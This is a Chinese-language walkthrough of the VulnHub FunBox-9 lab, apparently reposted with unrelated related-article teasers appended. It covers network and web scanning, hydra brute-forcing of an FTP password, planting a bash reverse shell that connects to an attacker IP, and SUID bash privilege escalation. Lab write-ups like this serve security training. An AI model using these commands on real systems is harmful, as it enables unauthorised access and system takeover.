vulnhub靶场之FunBox-9

一.环境搭建

1.靶场描述

It's a box for beginners, but not easy. Gather careful !!!
Hint:
Don't waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per account.
Enjoy the game and WYSIWYG ! 
This works better with VirtualBox rather than VMware
 

2.靶场下载
 

Funbox: GaoKao ~ VulnHub
 

 

image-20240526205715706
 

3.靶场启动
 

 

image-20240526205755099
 

二.信息收集
 

1.寻找靶场真实IP地址
 

nmap -sP 192.168.2.0/24
 

 

 

image-20240526210027543
 

arp-scan -l
 

 

 

image-20240526210108854
 

通过上面两个命令我们知道靶场真实IP地址为192.168.2.9
 

 

2.探测端口及服务
 

nmap -p- -sV 192.168.2.9
 

 

 

image-20240526210433043
 

开启了21端口,服务为ftp
开启了22端口,服务为ssh
开启了80端口,服务为apache2
开启了3306端口,服务为mysql
 

 

三.渗透测试
 

1.访问web服务
 

http://192.168.2.9
 

 

image-20240526211101872
 

2.扫描web服务
 

1)nikto扫描
 

nikto -h http://192.168.2.9
 

 

 

image-20240526212518825
 

2)dirsearch扫描
 

dirsearch -u http://192.168.2.9 -e * -x 403 --random-agent
 

 

 

image-20240526212428558
 

3)dirb扫描
 

dirb http://192.168.2.9
 

 

 

image-20240526212401279
 

4)gobuster扫描
 

gobuster dir -u http://192.168.2.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php.txt.html,zip
 

 

 

image-20240526212325048
 

都没有扫描到任何有用的信息,我们知道开启了21端口,我们查看ftp服务
 

3.渗透测试
 

1)ftp服务
 

ftp 192.168.2.9
 

 

 

image-20240526212731390
 

我们可以看到一个文件,我们进行查看
 

 

image-20240526212916428
 

sky@%L,我们可以看到用户名是sky,密码我们进行爆破
 

hydra -l sky -P  /usr/share/wordlists/rockyou.txt  ftp 192.168.2.9
 

 

 

image-20240526213515192
 

我们看到密码是thebest,我们进行登录
 

ftp 192.168.2.9
 

 

 

image-20240526213608449
 

我们可以看到登录成功,根目录有一个文件,我们进行查看
 

2)反弹shell
 

我们查看user.flag文件,可以看到是一个脚本,我们修改它,让它反弹shell
 

 

image-20240526214053917
 

bash -i >& /dev/tcp/192.168.2.8/6666 0>&1
 

 

 

image-20240531213602418
 

我们可以看到反弹成功,我们进行提权
 

3)提权
 

find / -perm -u=s -type f 2>/dev/null     # 查看提权方式
 

 

 

image-20240531213702464
 

我们可以看到bash提权,我们进行查看
 

 

image-20240531213835883
 

我们可以看到提权方式是bash -p
 

 

image-20240531213905156
 

 

image-20240531214100392
 

到这里,渗透测试结束
 

这里我们只要掌握ftp爆破和hydra爆破即可











本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/19882.shtml


如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!











相关文章










Web前端ES6-ES13笔记合集








Web前端ES6-ES13笔记合集




一. 走入ES6 ##### 1.初识ES6 > ECMAScript 6.0(以下简称 ES6)是 JavaScript 语言的下一代标准,已经在 2015 年 6 月正式发布了。它的目标,是使得 JavaScript 语言可以用来编写复杂的大型应用程序,成为企业级开发语…




阅读更多...

















在Spring中实现资源的动态加载和卸载








在Spring中实现资源的动态加载和卸载




在Spring框架中,实现资源的动态加载和卸载通常涉及以下几个方面: 
1. 使用Bean注解动态注册Bean 
通过在配置类中使用Bean注解,可以在运行时动态创建和注册Bean。 
Configuration
public class DynamicBeanConfig {Beanpublic MyBean myBean(…




阅读更多...

















博士毕业论文/CTEX/LATEX








博士毕业论文/CTEX/LATEX




LATEX环境安装 
CTEX 安装 (垃圾,不要装) 
运行 
clean.batcomp.bat 
缺少字体 
Couldn’t find Adobe Heiti S.cfg’ miktex-maketfm: No creation rule for font “Adobe Heiti Std”.解决方法:其实就是下载这四个字体之后&…




阅读更多...

















【大比武10】行业垂直大模型应用在档案管理中的探索








【大比武10】行业垂直大模型应用在档案管理中的探索




关注我们 -  数字罗塞塔计划  -   # 大比武2024 本篇是参加“华夏伟业”杯第二届档案信息化公司业务与技术实力大比武(简称“大比武 2024”)的投稿文章,来自广州龙建达电子股份有限公司,作者:陶宣任。 在这个人工智能技…




阅读更多...

















深入理解flask规则构建与动态变量应用








深入理解flask规则构建与动态变量应用




新书上架~👇全国包邮奥~ python实用小工具开发教程http://pythontoolsteach.com/3 欢迎关注我👆,收藏下次不迷路┗|`O′|┛ 嗷~~ 目录 
一、引言 
二、Flask规则基础 
1. 静态规则与动态规则 
2. 规则语法与结构 
三、动态变量应用…




阅读更多...

















CISCN 2022 初赛 ez_usb








CISCN 2022 初赛 ez_usb




还是从第一个 URB向后看  发现 同时 存在 2.8.1 2.10.1 2.4.1 但是显然 2.4.1 是7个字节 不满足 usb流量要求 只考虑 2.8.1 和 2.10.1 tshark -r ez_usb.pcapng -T json -Y "usb.src  \"2.8.1\"" -e usbhid.data > 281.json  正常取数据即可 
import js…




阅读更多...

















【vue】v-for只显示前几个数据,超出显示查看更多








【vue】v-for只显示前几个数据,超出显示查看更多




v-for只显示前几个数据,超出显示查看更多 
如图 <div v-for"(item,index) in list.slice(0,3)" :key"index"><div class"degreeNo" :class"index0?noOne:index1?noTwo:index2?noThree:">
NO{{index1}}:<…




阅读更多...

















读《Diffusion Models: A Comprehensive Survey of Methods and Applications》综述








读《Diffusion Models: A Comprehensive Survey of Methods and Applications》综述




读《Diffusion Models: A Comprehensive Survey of Methods and Applications》综述 关于此文&#xff0c;我的一个见解想法&#xff0c;重点关注他怎么描述 「Diffusion Model」的引用的&#xff0c;以及未来方向就好了。当然从这篇文章可以知道 「Diffusion Model」的一个基石…




阅读更多...

















HR人才测评,企业人才综合素质测评?








HR人才测评,企业人才综合素质测评?




HR企业人才综合素质测评是一种评估企业人才综合素质的方法。该测评方法通过对人才的综合能力、专业技能、沟通协调能力、团队合作能力、领导管理能力等方面进行评估&#xff0c;以期为企业提供更全面、更客观、更科学的人才选拔和管理的依据。   点击这里了解&#xff1a;『企业…




阅读更多...

















强化学习的应用场景:何时使用强化学习?








强化学习的应用场景:何时使用强化学习?




RL 强化学习的应用场景&#xff1a;何时使用强化学习&#xff1f;强化学习的基本原理适用场景1. 连续决策过程2. 不完全信息3. 动态环境4. 长期回报优化5. 无明确监督信号 实际案例游戏AI机器人控制自主驾驶金融交易推荐系统 结论 强化学习的应用场景&#xff1a;何时使用强化学…




阅读更多...

















免费生物蛋白质的类chatgpt工具助手copilot:小分子、蛋白的折叠、对接








免费生物蛋白质的类chatgpt工具助手copilot:小分子、蛋白的折叠、对接




参考: https://310.ai/copilot 
可以通过自然语言通话晚上蛋白质的相关处理:生成序列、折叠等 
应该是agent技术调用不同工具实现 从UniProt数据库中搜索和加载蛋白质。使用ESM Fold方法折叠蛋白质。使用310.ai基础模型设计新蛋白质。使用TM-Align方法比较蛋白质。利用Protei…




阅读更多...

















整合框架(spring...) 统一异常处理








整合框架(spring...) 统一异常处理




1、      我们想让异常结果也显示为统一的返回结果对象&#xff0c;并且统一处理系统的异常信息&#xff0c;那么需要统一异常处理。 附加&#xff1a;创建封装错误状态码和错误消息VO 代码如下&#xff1a; 
Result 
import io.swagger.v3.oas.annotations.media.Schema;
impo…




阅读更多...

















MapDB:轻量级、高性能的Java嵌入式数据库引擎








MapDB:轻量级、高性能的Java嵌入式数据库引擎




MapDB&#xff1a;轻量级、高性能的Java嵌入式数据库引擎 
在今天的软件开发中&#xff0c;嵌入式数据库因其轻便、高效和易于集成而备受欢迎。对于Java开发者来说&#xff0c;MapDB无疑是一个值得关注的选项。MapDB是一个纯Java编写的嵌入式数据库引擎&#xff0c;它提供了高性…




阅读更多...

















【手撕面试题】Vue(高频知识点一)








【手撕面试题】Vue(高频知识点一)




每天10道题&#xff0c;100天后&#xff0c;搞定所有前端面试的高频知识点&#xff0c;加油&#xff01;&#xff01;&#xff01;&#xff0c;在看文章的同时&#xff0c;希望不要直接看答案&#xff0c;先思考一下自己会不会&#xff0c;如果会&#xff0c;自己的答案是什么&…




阅读更多...

















对于C++STL及其时间复杂度的总结








对于C++STL及其时间复杂度的总结




由于本次在山东CCPC邀请赛中&#xff0c;对于堆的时间复杂度记忆不清晰&#xff0c;导致第4题没有做出来&#xff0c;与铜牌失之交臂&#xff0c;故觉应整理STL的时间复杂度。 
本文仅整理有用&#xff08;竞赛&#xff09;的stl及其用法&#xff0c;并且不阐述过于基础的内容。…




阅读更多...

















linux服务器配置GroundingDINO 详细过程








linux服务器配置GroundingDINO 详细过程




linux服务器配置GroundingDINO 详细过程 1. 参考帖子2. 配置流程&#xff1a;环境配置&#xff1a;py310, cuda118, pytorch2.12.1 设置相关的环境变量&#xff1a;2.2 配置conda下载anaconda 配置相对应的环境 1. 参考帖子 
已经跑通了&#xff0c;该踩的坑也都踩过来了&#…




阅读更多...

















MOE模型入门








MOE模型入门




一、目录 
定义&#xff1a;MOE架构代表类型如何解决expert 平衡的&#xff1f;而不是集中到某一专家。如何训练、微调MOE模型&#xff1f;基础架构优缺点不同MOE 模型实现方式、训练方法 
二、实现 
定义&#xff1a;MOE架构 MOE:混合专家模型&#xff0c;多个专家共同决策的模…




阅读更多...

















Redis 探索之旅(进阶)








Redis 探索之旅(进阶)




目录 
今日良言&#xff1a;从不缺乏从头开始的勇气 
一、持久化 
1、RDB 
2、AOF 
二、Redis 的事务 
三、主从复制 四、哨兵模式 五、集群模式 
六、缓存 
七、分布式锁 今日良言&#xff1a;从不缺乏从头开始的勇气 一、持久化 
持久化就是把数据存储在硬盘上&#xff0c;无…




阅读更多...

















SQL 入门:使用 MySQL 进行数据库操作








SQL 入门:使用 MySQL 进行数据库操作




SQL 入门&#xff1a;使用 MySQL 进行数据库操作 
目录 
引言SQL 基础 SQL 语言概述MySQL 简介 数据库设计基础 数据库与表的设计常见数据类型 MySQL 安装与配置 安装 MySQL基本配置与连接 基本 SQL 语句 数据库的创建与删除表的创建、修改与删除数据插入、更新与删除 数据查询…




阅读更多...

















CUDA学习(2)








CUDA学习(2)




什么是CUDA 
CUDA&#xff08;Compute Unified Device Architecture&#xff09;&#xff0c;统一计算设备架构&#xff0c;英伟达推出的基于其GPU的通用高性能计算平台和编程模型。 
借助CUDA&#xff0c;开发者可以充分利用英伟达GPU的强大计算能力加速各种计算任务。 
软件生…




阅读更多...


















最新文章


















Copyright @ 2022~2023